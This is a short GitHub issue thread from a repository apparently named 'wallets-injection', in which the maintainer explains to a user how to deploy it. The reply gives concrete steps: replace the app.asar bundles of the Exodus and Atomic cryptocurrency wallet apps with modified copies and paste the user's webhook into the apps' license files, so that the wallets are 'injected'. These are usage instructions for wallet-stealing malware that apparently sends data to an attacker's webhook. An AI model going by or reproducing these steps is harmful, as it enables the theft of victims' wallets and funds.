### ISSUE TITLE
how can i use it and set up to my webhook

### ISSUE THREAD

**Issue by waltuhium23** [hackirby/wallets-injection#2]

**Comment by hackirby** [comment]
replace `%APPDATA%\Local\exodus\app-<version>\resources\app.asar` with `exodus.asar`
replace `%APPDATA%\Local\Programs\atomic\resources\app.asar` with `atomic.asar`

paste your webhook inside `%APPDATA%\Local\exodus\app-<version>\LICENSE`
paste your webhook inside `%APPDATA%\Local\Programs\atomic\LICENSE.electron.txt`

Atomic and Exodus are now injected
